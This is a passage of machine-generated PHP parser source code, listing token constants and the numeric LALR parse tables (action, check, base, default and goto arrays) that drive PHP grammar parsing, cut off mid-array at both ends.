T_SR_EQUAL = 277; const T_BOOLEAN_OR = 278; const T_BOOLEAN_AND = 279; const T_IS_EQUAL = 280; const T_IS_NOT_EQUAL = 281; const T_IS_IDENTICAL = 282; const T_IS_NOT_IDENTICAL = 283; const T_IS_SMALLER_OR_EQUAL = 284; const T_IS_GREATER_OR_EQUAL = 285; const T_SL = 286; const T_SR = 287; const T_INSTANCEOF = 288; const T_INC = 289; const T_DEC = 290; const 
T_INT_CAST = 291; const T_DOUBLE_CAST = 292; const T_STRING_CAST = 293; const T_ARRAY_CAST = 294; const T_OBJECT_CAST = 295; const T_BOOL_CAST = 296; const T_UNSET_CAST = 297; const T_NEW = 298; const T_CLONE = 299; const T_EXIT = 300; const T_IF = 301; const T_ELSEIF = 302; const T_ELSE = 303; const T_ENDIF = 304; const T_LNUMBER = 305; const T_DNUMBER = 306; const T_STRING = 307; const T_STRING_VARNAME = 308; const T_VARIABLE = 309; const T_NUM_STRING = 310; const T_INLINE_HTML = 311; const T_CHARACTER = 312; const T_BAD_CHARACTER = 313; const T_ENCAPSED_AND_WHITESPACE = 314; const T_CONSTANT_ENCAPSED_STRING = 315; const T_ECHO = 316; const T_DO = 317; const T_WHILE = 318; const T_ENDWHILE = 319; const T_FOR = 320; const T_ENDFOR = 321; const T_FOREACH = 322; const T_ENDFOREACH = 323; const T_DECLARE = 324; const T_ENDDECLARE = 325; const T_AS = 326; const T_SWITCH = 327; const T_ENDSWITCH = 328; const T_CASE = 329; const T_DEFAULT = 330; const T_BREAK = 331; const T_CONTINUE = 332; const T_GOTO = 333; const T_FUNCTION = 334; const T_CONST = 335; const T_RETURN = 336; const T_TRY = 337; const T_CATCH = 338; const T_FINALLY = 339; const T_THROW = 340; const T_USE = 341; const T_INSTEADOF = 342; const T_GLOBAL = 343; const T_STATIC = 344; const T_ABSTRACT = 345; const T_FINAL = 346; const T_PRIVATE = 347; const T_PROTECTED = 348; const T_PUBLIC = 349; const T_VAR = 350; const T_UNSET = 351; const T_ISSET = 352; const T_EMPTY = 353; const T_HALT_COMPILER = 354; const T_CLASS = 355; const T_TRAIT = 356; const T_INTERFACE = 357; const T_EXTENDS = 358; const T_IMPLEMENTS = 359; const T_OBJECT_OPERATOR = 360; const T_DOUBLE_ARROW = 361; const T_LIST = 362; const T_ARRAY = 363; const T_CALLABLE = 364; const T_CLASS_C = 365; const T_TRAIT_C = 366; const T_METHOD_C = 367; const T_FUNC_C = 368; const T_LINE = 369; const T_FILE = 370; const T_COMMENT = 371; const T_DOC_COMMENT = 372; const T_OPEN_TAG = 373; const T_OPEN_TAG_WITH_ECHO = 374; const T_CLOSE_TAG = 375; const 
T_WHITESPACE = 376; const T_START_HEREDOC = 377; const T_END_HEREDOC = 378; const T_DOLLAR_OPEN_CURLY_BRACES = 379; const T_CURLY_OPEN = 380; const T_PAAMAYIM_NEKUDOTAYIM = 381; const T_NAMESPACE = 382; const T_NS_C = 383; const T_DIR = 384; const T_NS_SEPARATOR = 385; // }}} /* @var array Map of token ids to their respective names */ protected static $terminals = array( "EOF", "error", "T_INCLUDE", "T_INCLUDE_ONCE", "T_EVAL", "T_REQUIRE", "T_REQUIRE_ONCE", "','", "T_LOGICAL_OR", "T_LOGICAL_XOR", "T_LOGICAL_AND", "T_PRINT", "T_YIELD", "'='", "T_PLUS_EQUAL", "T_MINUS_EQUAL", "T_MUL_EQUAL", "T_DIV_EQUAL", "T_CONCAT_EQUAL", "T_MOD_EQUAL", "T_AND_EQUAL", "T_OR_EQUAL", "T_XOR_EQUAL", "T_SL_EQUAL", "T_SR_EQUAL", "'?'", "':'", "T_BOOLEAN_OR", "T_BOOLEAN_AND", "'|'", "'^'", "'&'", "T_IS_EQUAL", "T_IS_NOT_EQUAL", "T_IS_IDENTICAL", "T_IS_NOT_IDENTICAL", "'<'", "T_IS_SMALLER_OR_EQUAL", "'>'", "T_IS_GREATER_OR_EQUAL", "T_SL", "T_SR", "'+'", "'-'", "'.'", "'*'", "'/'", "'%'", "'!'", "T_INSTANCEOF", "'~'", "T_INC", "T_DEC", "T_INT_CAST", "T_DOUBLE_CAST", "T_STRING_CAST", "T_ARRAY_CAST", "T_OBJECT_CAST", "T_BOOL_CAST", "T_UNSET_CAST", "'@'", "'['", "T_NEW", "T_CLONE", "T_EXIT", "T_IF", "T_ELSEIF", "T_ELSE", "T_ENDIF", "T_LNUMBER", "T_DNUMBER", "T_STRING", "T_STRING_VARNAME", "T_VARIABLE", "T_NUM_STRING", "T_INLINE_HTML", "T_ENCAPSED_AND_WHITESPACE", "T_CONSTANT_ENCAPSED_STRING", "T_ECHO", "T_DO", "T_WHILE", "T_ENDWHILE", "T_FOR", "T_ENDFOR", "T_FOREACH", "T_ENDFOREACH", "T_DECLARE", "T_ENDDECLARE", "T_AS", "T_SWITCH", "T_ENDSWITCH", "T_CASE", "T_DEFAULT", "T_BREAK", "T_CONTINUE", "T_GOTO", "T_FUNCTION", "T_CONST", "T_RETURN", "T_TRY", "T_CATCH", "T_FINALLY", "T_THROW", "T_USE", "T_INSTEADOF", "T_GLOBAL", "T_STATIC", "T_ABSTRACT", "T_FINAL", "T_PRIVATE", "T_PROTECTED", "T_PUBLIC", "T_VAR", "T_UNSET", "T_ISSET", "T_EMPTY", "T_HALT_COMPILER", "T_CLASS", "T_TRAIT", "T_INTERFACE", "T_EXTENDS", "T_IMPLEMENTS", "T_OBJECT_OPERATOR", "T_DOUBLE_ARROW", "T_LIST", "T_ARRAY", "T_CALLABLE", 
"T_CLASS_C", "T_TRAIT_C", "T_METHOD_C", "T_FUNC_C", "T_LINE", "T_FILE", "T_START_HEREDOC", "T_END_HEREDOC", "T_DOLLAR_OPEN_CURLY_BRACES", "T_CURLY_OPEN", "T_PAAMAYIM_NEKUDOTAYIM", "T_NAMESPACE", "T_NS_C", "T_DIR", "T_NS_SEPARATOR", "';'", "'{'", "'}'", "'('", "')'", "'$'", "'`'", "']'", "'\"'" , "???" ); /* @var array Map which translates lexer tokens to internal tokens */ protected static $translate = array( 0, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 48, 150, 151, 147, 47, 31, 151, 145, 146, 45, 42, 7, 43, 44, 46, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 26, 142, 36, 13, 38, 25, 60, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 61, 151, 149, 30, 151, 148, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 143, 29, 144, 50, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 151, 1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 27, 28, 32, 33, 34, 35, 37, 39, 40, 41, 49, 51, 52, 53, 54, 55, 56, 57, 58, 59, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 151, 151, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 
101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 151, 151, 151, 151, 151, 151, 133, 134, 135, 136, 137, 138, 139, 140, 141 ); protected static $yyaction = array( 59, 60, 325, 61, 62,-32766,-32766,-32766, 324, 63, 64,-32767,-32767,-32767,-32767, 98, 99, 100, 101, 102, 57, 917,-32766, 298,-32766,-32766, 41, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 267, 346, 65, 66, 927, 249, 929, 928, 67, 535, 68, 220, 221, 69, 70, 71, 72, 73, 74, 75, 76, 31, 232, 77, 318, 326, 730, 732, 462, 836, 837, 362, 348, 895, 238, 578, 280, 363, 46, 27, 327, 859, 364, 246, 365, 454, 366, 39, 223, 328,-32766,-32766, -32766, 36, 37, 367, 333, 360, 38, 368, 329, 423, 78, 848, 122, 278, 279,-32766, 286,-32766, 35, 369, 370, 371, 372, 373, 389, 343, 861, 330, 560, 602, 374, 375, 376, 377, 848, 842, 843, 844, 845, 839, 840, 239, 82, 83, 84, -350, 389, 846, 841, 330, 584, 504, 126, 47, 227, 259, 244, 802, 248, 40, 351, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 788, 233, 576,-32766,-32766,-32766, 701, 702, 703, 700, 699, 698, 630, 0,-32766,-32766,-32766, 655, 656, 216,-32766, 215,-32766,-32766,-32766,-32766,-32766,-32767, -32767,-32767,-32767,-32766, 788, 322, 329, 319, 899, 544, -117, 257, 128, 277,-32766,-32766,-32766, 369, 370, 889, 693, 261, 895, 225, 226,-32766, 540, 602, 374, 375, 675, 535, 344,-32766, 535,-32766, 895, 376,-32766,-32766, -32766, 575,-32766, 53,-32766, 322,-32766, 658, 263,-32766, 187, 257, 600,-32766,-32766,-32766, 788,-32766,-32766,-32766, 693, 34,-32766, 535, 350,-32766, 388,-32766, 860, 812, -32766,-32766,-32766,-32766,-32766, 222,-32766, 54,-32766, 56, 127,-32766, 100, 101, 102,-32766,-32766,-32766, 788, 22, -32766,-32766, 601, 268,-32766, 924, 259,-32766, 388, 666, 631, 389,-32766,-32766, 330,-32766, 322, 224, 334,-32766, 259, 917, 257, 503, 861, 535, 103, 104, 105,-32766, 233, 693,-32766,-32766,-32766, 
118,-32766, 494,-32766, 340, -32766, 506, 902,-32766,-32766,-32766, 126,-32766,-32766,-32766, 345,-32766,-32766,-32766, 213, 123,-32766, 535, 130,-32766, 388,-32766, 452, 599,-32766,-32766,-32766,-32766,-32766, 119, -32766, 120,-32766, 788, 233,-32766, 189, -113, 190,-32766, -32766,-32766, 194, 217,-32766,-32766, 195, 125,-32766,-32766, -32766,-32766, 388, 188, 685, 858,-32766,-32766, 117,-32766, 329, 319, 353, 28, 509, 788, 597, 277, 357, 468, 680, 369, 370, 516,-32766,-32766,-32766, 131, 287, 49, 540, 602, 374, 375, 477, 478,-32766, 520,-32766,-32766, 528,-32766, 535,-32766,-32766,-32766,-32766, 655, 656,-32766, -32766,-32766, 263,-32766, 519,-32766, 507,-32766, 542, 129, -32766, 679, 525, 588,-32766,-32766,-32766, 526,-32766,-32766, -32766, 690, 530,-32766, 535, 306,-32766, 388,-32766, 541, 511,-32766,-32766,-32766,-32766,-32766, 224,-32766, 50,-32766, 58, 482,-32766, 55, 805, 51,-32766,-32766,-32766, 788, 52,-32766,-32766, 416, 232,-32766, 502, 687,-32766, 388, 445, 491, 229,-32766,-32766, 551,-32766, 922, 549, 415, -32766, 339, 341, 535, 536, 399, 535, 400, 402, 414, -32766, -158, 401,-32766,-32766,-32766, 493,-32766, 479,-32766, 475,-32766, -161, 604,-32766,-32766,-32766, 265,-32766,-32766, -32766, 788,-32766,-32766,-32766, 266, 917,-32766, 535, 256, -32766, 388,-32766, 342, 212,-32766,-32766,-32766,-32766,-32766, 338,-32766, 471,-32766, 457, 473,-32766, 359, 603, 258, -32766,-32766,-32766, 788, 255,-32766,-32766, 577, 260,-32766, 376, 579,-32766, 388, 847, 247, 0,-32766,-32766, -350, -32766, 657, 0, 337,-32766, 0, 0, -351, 245, 0, 535, 121, 193, 42,-32766, -282, 791,-32766,-32766,-32766, 0,-32766, 0,-32766, 0,-32766, 0, 0,-32766, 570, -32766, -290,-32766,-32766,-32766, 788,-32766,-32766,-32766, -291, 499,-32766, 535, 300,-32766, 388,-32766, 288, 251,-32766, -32766,-32766,-32766,-32766, 242,-32766, 407,-32766, 684, 340, -32766, 686, 614, 616,-32766,-32766,-32766, 618, 563,-32766, -32766, 625, 624,-32766, 633, 580,-32766, 388, 565, 587, 574, 572,-32766, 
513,-32766, 512, 45, 44,-32766, 569, 571, 573, 586, 545, 535, 683, 676, 234,-32766, 510, 515,-32766,-32766,-32766, 517,-32766, 522,-32766, 81,-32766, 124, 523,-32766,-32766,-32766, 524,-32766,-32766,-32766, 527, -32766,-32766,-32766, 505, 529,-32766, 535, 890,-32766, 388, -32766, 900, 668,-32766,-32766,-32766,-32766,-32766, 827,-32766, 892,-32766, 880, 894,-32766, 191, 192, 896,-32766,-32766, -32766, 923, 356,-32766,-32766, 623, 926,-32766, 622, 925, -32766, 388, 32, 33, 185, 568,-32766, 321,-32766, 317, 43, 262, 836, 837, 237,-32766,-32766, 236, 48,-32766, 838, 535, 235, 30, 219,-32766, 218, 214,-32766,-32766, -32766, 186,-32766, 80,-32766, 79,-32766,-32766,-32766,-32766, 768, 829, 767,-32766,-32766,-32766, 446, -114,-32766,-32766, 854, 659,-32766, 795, 792,-32766, 388, 498, 472, 437, 358, 354, 307,-32766, 289, 25, 24, 23, 442, -113, 842, 843, 844, 845, 839, 840, 309, 786, 0, 480, 874, 855, 846, 841, 329, 319, 921, 826,-32766, 329, -32766, 277,-32766,-32766, 891, 369, 370,-32766,-32766,-32766, 369, 370, 875, 879, 540, 602, 374, 375, 893, 560, 602, 374, 375, 329,-32766, 811,-32766,-32766,-32766,-32766, -32766, 799, 797, 798, 369, 370, 263, 329, 796, 0, 0, 329, 543, 560, 602, 374, 375, 598, 369, 370, 0, 0, 369, 370, 329, 0, 0, 560, 602, 374, 375, 560, 602, 374, 375, 369, 370, 0, 0, 0, 329, 691, 0, 0, 560, 602, 374, 375, 0, 0, 0, 369, 370, 329, 0, 790, 0, 329, 501, 591, 560, 602, 374, 375, 369, 370, 0, 0, 369, 370, 0, 329, 593, 560, 602, 374, 375, 560, 602, 374, 375, 0, 369, 370, 492, 0, 0, 0, 514, 0, 486, 560, 602, 374, 375, 329, 0, 0, 0, 329, 0, 561, 0, 0, 0, 789, 369, 370, 0, 0, 369, 370,-32766,-32766,-32766, 560, 602, 374, 375, 560, 602, 374, 375, 0, 329, 0, 0, 0, 0,-32766, 0,-32766,-32766,-32766,-32766, 369, 370, 0, 0, 0, 0, 0, 0, 0, 560, 602, 374, 375 ); protected static $yycheck = array( 2, 3, 4, 5, 6, 8, 9, 10, 7, 11, 12, 36, 37, 38, 39, 40, 41, 42, 43, 44, 61, 76, 25, 73, 27, 28, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 61, 7, 42, 43, 71, 76, 73, 74, 
48, 71, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 51, 52, 76, 69, 70, 71, 71, 73, 7, 75, 7, 77, 78, 79, 80, 134, 82, 122, 84, 81, 86, 135, 136, 89, 8, 9, 10, 93, 94, 95, 96, 7, 98, 99, 96, 122, 102, 134, 143, 105, 106, 25, 7, 27, 7, 107, 108, 113, 114, 115, 138, 26, 117, 141, 116, 117, 118, 119, 124, 125, 134, 127, 128, 129, 130, 131, 132, 133, 8, 9, 10, 122, 138, 139, 140, 141, 142, 143, 143, 145, 31, 147, 148, 146, 150, 25, 7, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 12, 49, 142, 8, 9, 10, 106, 107, 108, 109, 110, 111, 26, 0, 8, 9, 10, 125, 126, 31, 25, 7, 27, 28, 29, 30, 31, 32, 33, 34, 35, 25, 12, 97, 96, 97, 71, 142, 146, 103, 61, 103, 8, 9, 10, 107, 108, 73, 112, 7, 73, 31, 7, 65, 116, 117, 118, 119, 142, 71, 143, 8, 71, 75, 73, 124, 78, 79, 80, 142, 82, 61, 84, 97, 86, 146, 138, 89, 7, 103, 144, 93, 94, 95, 12, 65, 98, 99, 112, 7, 102, 71, 71, 105, 106, 75, 71, 106, 78, 79, 80, 113, 82, 31, 84, 61, 86, 61, 143, 89, 42, 43, 44, 93, 94, 95, 12, 146, 98, 99, 144, 147, 102, 144, 147, 105, 106, 73, 142, 138, 142, 143, 141, 113, 97, 31, 145, 65, 147, 76, 103, 71, 117, 71, 45, 46, 47, 75, 49, 112, 78, 79, 80, 143, 82, 71, 84, 141, 86, 143, 146, 89, 142, 143, 143, 93, 94, 95, 7, 65, 98, 99, 123, 7, 102, 71, 143, 105, 106, 75, 147, 144, 78, 79, 80, 113, 82, 143, 84, 143, 86, 12, 49, 89, 13, 146, 13, 93, 94, 95, 13, 147, 98, 99, 13, 26, 102, 8, 9, 105, 106, 13, 142, 150, 142, 143, 13, 113, 96, 97, 66, 67, 26, 12, 31, 103, 66, 67, 144, 107, 108, 26, 8, 9, 10, 91, 92, 61, 116, 117, 118, 119, 100, 101, 65, 26, 142, 143, 26, 25, 71, 27, 28, 29, 75, 125, 126, 78, 79, 80, 138, 82, 26, 84, 26, 86, 144, 26, 89, 142, 143, 26, 93, 94, 95, 26, 65, 98, 99, 142, 143, 102, 71, 72, 105, 106, 75, 142, 143, 78, 79, 80, 113, 82, 31, 84, 61, 86, 61, 68, 89, 61, 73, 61, 93, 94, 95, 12, 61, 98, 99, 88, 62, 102, 71, 71, 105, 106, 88, 71, 88, 142, 143, 71, 113, 71, 71, 71, 65, 71, 71, 71, 71, 71, 71, 71, 71, 71, 75, 88, 73, 
78, 79, 80, 73, 82, 73, 84, 73, 86, 73, 117, 89, 142, 143, 76, 93, 94, 95, 12, 65, 98, 99, 76, 76, 102, 71, 121, 105, 106, 75, 80, 88, 78, 79, 80, 113, 82, 96, 84, 90, 86, 90, 103, 89, 96, 117, 104, 93, 94, 95, 12, 120, 98, 99, 142, 120, 102, 124, 142, 105, 106, 134, 122, -1, 142, 143, 122, 113, 146, -1, 141, 65, -1, -1, 122, 122, -1, 71, 123, 123, 123, 75, 137, 146, 78, 79, 80, -1, 82, -1, 84, -1, 86, -1, -1, 89, 142, 143, 137, 93, 94, 95, 12, 65, 98, 99, 137, 137, 102, 71, 137, 105, 106, 75, 137, 137, 78, 79, 80, 113, 82, 137, 84, 141, 86, 142, 141, 89, 142, 142, 142, 93, 94, 95, 142, 142, 98, 99, 142, 142, 102, 142, 142, 105, 106, 142, 142, 142, 142, 143, 142, 113, 142, 142, 142, 65, 142, 142, 142, 142, 142, 71, 142, 142, 145, 75, 143, 143, 78, 79, 80, 143, 82, 143, 84, 143, 86, 143, 143, 89, 142, 143, 143, 93, 94, 95, 143, 65, 98, 99, 143, 143, 102, 71, 144, 105, 106, 75, 144, 144, 78, 79, 80, 113, 82, 144, 84, 144, 86, 144, 144, 89, 42, 43, 144, 93, 94, 95, 144, 144, 98, 99, 144, 144, 102, 144, 144, 105, 106, 145, 145, 61, 142, 143, 145, 113, 145, 145, 145, 69, 70, 145, 65, 73, 145, 145, 145, 77, 71, 145, 145, 145, 75, 145, 145, 78, 79, 80, 145, 82, 145, 84, 145, 86, 142, 143, 89, 146, 146, 146, 93, 94, 95, 146, 146, 98, 99, 146, 146, 102, 146, 146, 105, 106, 146, 146, 146, 146, 146, 146, 113, 146, 146, 146, 146, 125, 146, 127, 128, 129, 130, 131, 132, 133, 148, -1, 149, 149, 149, 139, 140, 96, 97, 149, 149, 145, 96, 147, 103, 142, 143, 149, 107, 108, 8, 9, 10, 107, 108, 149, 149, 116, 117, 118, 119, 149, 116, 117, 118, 119, 96, 25, 149, 27, 28, 29, 30, 31, 149, 149, 149, 107, 108, 138, 96, 149, -1, -1, 96, 144, 116, 117, 118, 119, 144, 107, 108, -1, -1, 107, 108, 96, -1, -1, 116, 117, 118, 119, 116, 117, 118, 119, 107, 108, -1, -1, -1, 96, 144, -1, -1, 116, 117, 118, 119, -1, -1, -1, 107, 108, 96, -1, 144, -1, 96, 83, 144, 116, 117, 118, 119, 107, 108, -1, -1, 107, 108, -1, 96, 144, 116, 117, 118, 119, 116, 117, 118, 119, -1, 107, 108, 85, -1, -1, -1, 144, 
-1, 87, 116, 117, 118, 119, 96, -1, -1, -1, 96, -1, 144, -1, -1, -1, 144, 107, 108, -1, -1, 107, 108, 8, 9, 10, 116, 117, 118, 119, 116, 117, 118, 119, -1, 96, -1, -1, -1, -1, 25, -1, 27, 28, 29, 30, 107, 108, -1, -1, -1, -1, -1, -1, -1, 116, 117, 118, 119 ); protected static $yybase = array( 0, 728, 294, 110, 817, 804, 2, 863, 859, 733, 821, 788, 771, 835, 775, 757, 888, 888, 888, 888, 888, 368, 377, 391, 394, 391, 410, -2, -2, -2, 435, 244, 244, 635, 244, 276, 603, 467, 519, 383, 351, 160, 192, 551, 551, 551, 551, 690, 690, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 551, 158, 429, 468, 470, 527, 528, 529, 530, 450, 456, 634, 587, 583, 413, 579, 578, 576, 574, 568, 588, 567, 670, 563, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 225, 371, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 206, 178, 178, 80, 683, 683, 683, 683, 683, 683, 683, 683, 683, 683, 683, -3, 396, 964, 829, 167, 167, 167, 167, 13, -25, -25, -25, -25, 148, 108, 209, 113, 113, 446, 446, 422, 547, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 449, 415, 240, 240, 614, 614, 64, 64, 64, 64, 302, -33, -55, 235, -1, 256, 451, 137, 137, 137, 459, 440, 460, 193, 271, 271, 271, -24, -24, -24, -24, 545, -24, -24, -24, 188, 216, -50, -50, -29, 205, 464, 594, 462, 591, 299, 482, -41, 317, 442, 226, 454, 442, 326, 332, 314, 458, 89, 226, 158, 197, 309, 218, 425, 428, 531, 395, 67, 99, 32, -23, 182, 146, 143, 402, 640, 636, 186, 151, 465, 101, -10, 182, 221, 534, 88, 1, 533, 242, 365, 598, 436, 618, 438, 436, 445, 365, 613, 613, 613, 613, 365, 432, 618, 618, 365, 422, 618, 254, 432, 365, 444, 432, 448, 613, 523, 521, 
436, 439, 418, 618, 618, 618, 438, 365, 613, 452, 243, 618, 613, 452, 365, 445, 185, 417, 348, 605, 630, 602, 434, 560, 441, 406, 621, 619, 628, 437, 430, 622, 597, 495, 518, 431, 375, 407, 414, 419, 497, 412, 466, 454, 498, 315, 457, 491, 457, 719, 486, 474, 453, 463, 517, 370, 353, 536, 495, 648, 656, 669, 433, 532, 653, 457, 714, 525, 338, 355, 617, 427, 457, 612, 457, 537, 457, 647, 426, 592, 495, 315, 315, 315, 645, 713, 712, 706, 699, 694, 693, 685, 409, 678, 516, 655, 65, 626, 458, 490, 424, 513, 214, 677, 457, 457, 541, 545, 457, 512, 524, 661, 510, 652, 447, 469, 672, 440, 654, 457, 461, 671, 214, 408, 403, 641, 509, 543, 604, 548, 359, 644, 606, 552, 363, 595, 421, 506, 660, 659, 663, 505, 556, 420, 401, 443, 609, 501, 651, 423, 483, 455, 404, 561, 416, 658, 500, 499, 496, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 0, 0, 0, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 124, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 163, 124, 124, 124, 124, 124, 124, 124, 124, 0, 271, 271, 271, 271, 72, 72, 72, 163, 163, 163, 163, 163, 163, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 72, 72, 271, 271, 163, 163, -24, -24, -24, -24, -24, -50, -50, -50, 146, -24, -50, 149, 149, 149, -50, -50, -50, 146, 0, 0, 0, 0, 0, 0, 0, 149, 0, 0, 0, 432, 618, 0, 
0, 0, 149, 316, 316, 316, 316, 214, 182, 0, 495, 432, 0, 439, 432, 0, 0, 0, 618, 0, 0, 0, 0, 0, 0, 338, 532, 333, 495, 0, 0, 0, 0, 0, 0, 0, 495, 217, 217, 0, 0, 409, 0, 0, 0, 0, 333, 0, 0, 214 ); protected static $yydefault = array( 3,32767,32767, 1,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767, 106, 98, 112, 97, 108,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767, 377, 377,32767, 334,32767,32767,32767,32767,32767, 32767,32767,32767, 179, 179, 179,32767,32767,32767, 366, 366, 366, 366, 366, 366, 366, 366, 366, 366,32767, 32767,32767,32767,32767, 257,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767, 262, 382,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767, 238, 239, 241, 242, 178, 367, 131, 263, 381, 177, 205, 207, 256, 206, 183, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 182, 235, 234, 203, 331, 331, 334,32767,32767, 32767,32767,32767,32767,32767,32767, 204, 208, 210, 209, 225, 226, 223, 224, 181, 227, 228, 229, 230, 163, 163, 163,32767,32767, 376, 376,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767, 164,32767, 217, 218, 292, 292, 122, 122, 122, 122, 122,32767, 32767,32767,32767,32767, 300,32767,32767,32767,32767,32767, 302,32767, 212, 213, 211,32767,32767,32767,32767,32767, 32767,32767,32767,32767, 339, 301,32767,32767,32767,32767, 32767,32767,32767,32767, 352, 288,32767,32767,32767, 281, 32767, 109, 111, 61, 318,32767,32767,32767,32767,32767, 357,32767,32767,32767, 17,32767,32767,32767, 389, 352, 32767,32767, 19,32767,32767,32767,32767, 233,32767,32767, 
356, 350,32767,32767,32767,32767,32767, 65, 297,32767, 303,32767,32767,32767, 65,32767,32767,32767,32767, 65, 32767, 355, 354, 65,32767, 282, 333,32767, 65, 76, 32767, 74,32767, 95, 95,32767,32767, 78, 329, 345, 32767,32767, 65,32767, 270, 333,32767,32767, 270, 65, 32767,32767, 4, 307,32767,32767,32767,32767,32767,32767, 32767,32767,32767,32767,32767,32767,32767,32767, 283,32767, 32767,32767, 253, 254, 341,32767, 342,32767, 281,32767, 221, 200,32767, 202,32767,32767, 286, 289,32767,32767, 32767, 140,32767, 284,32767, 186,32767,32767,32767,32767, 384,32767,32767, 180,32767,32767,32767, 136,32767, 63, 32767, 374,32767,32767, 350, 285, 214, 215, 216,32767, 32767,32767,32767,32767,32767,32767,32767, 351,32767,32767, 32767, 116,32767, 318,32767,32767,32767, 77,32767, 184, 132,32767,32767, 383,32767,32767,32767,32767,32767,32767, 338,32767,32767,32767, 64,32767,32767, 79,32767,32767, 350,32767,32767,32767,32767, 120,32767,32767,32767, 175, 32767,32767,32767,32767,32767, 350,32767,32767,32767,32767, 32767,32767,32767,32767, 4,32767, 157,32767,32767,32767, 32767,32767,32767,32767, 25, 25, 3, 25, 103, 25, 143, 3, 95, 95, 58, 143, 25, 143, 25, 25, 25, 25, 25, 25, 25, 150, 25, 25, 25, 25, 25 ); protected static $yygoto = array( 161, 135, 135, 140, 135, 161, 136, 137, 138, 143, 145, 169, 163, 159, 159, 159, 159, 140, 140, 160, 160, 160, 160, 160, 160, 160, 160, 160, 160, 155, 156, 157, 158, 167, 134, 750, 751, 390, 753, 774, 775, 776, 777, 778, 779, 780, 782, 718, 139, 141, 142, 144, 165, 166, 168, 184, 196, 197, 198, 199, 200, 201, 202, 203, 205, 206, 207, 208, 230, 